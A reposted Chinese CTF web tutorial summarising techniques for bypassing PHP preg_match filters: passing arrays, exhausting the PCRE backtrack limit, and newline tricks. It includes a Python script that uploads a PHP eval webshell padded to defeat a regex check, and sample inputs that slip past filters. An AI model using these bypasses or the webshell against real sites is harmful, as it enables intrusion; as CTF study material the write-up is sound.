码上欢乐
相关内容   简体   繁体

preg_match绕过总结

本文转载自  查看原文  2020-01-15 18:44  10588    CTF Web

preg_match绕过总结

什么是preg_match

绕过方法

1、数组绕过

preg_match只能处理字符串,当传入的subject是数组时会返回false

2、PCRE回溯次数限制

PHP利用PCRE回溯次数限制绕过某些安全限制

import requests
from io import BytesIO

files = {
  'file': BytesIO(b'aaa<?php eval($_POST[txt]);//' + b'a' * 1000000)
}

res = requests.post('http://51.158.75.42:8088/index.php', files=files, allow_redirects=False)
print(res.headers)

pcre.backtrack_limit给pcre设定了一个回溯次数上限,默认为1000000,如果回溯次数超过这个数字,preg_match会返回false

3、换行符

.不会匹配换行符,如

if (preg_match('/^.*(flag).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
}

只需要

$json="\nflag"

而在非多行模式下,$似乎会忽略在句尾的%0a

if (preg_match('/^flag$/', $_GET['a']) && $_GET['a'] !== 'flag') {
    echo $flag;
}

只需要传入

?a=flag%0a


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 preg_match()绕过的问题总结 php中函数preg_match或preg_match_all 第三个参数$match的解释 ***PHP preg_match正则表达式的使用 PHP preg_match正则表达式的使用 PHP preg_match正则表达式的使用 向PHP要效率——加快你的代码执行速度(strpos 快于 preg_match 快于 strstr 快于 ereg) 解决 PHP 报 ErrorException: preg_match(): Compilation failed: invalid range in character class at offset ... 错误 PHP中判断字符串是否包含某个字符时,建议使用正则表达式preg_match() XSS过滤绕过总结 命令注入绕过技巧总结
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM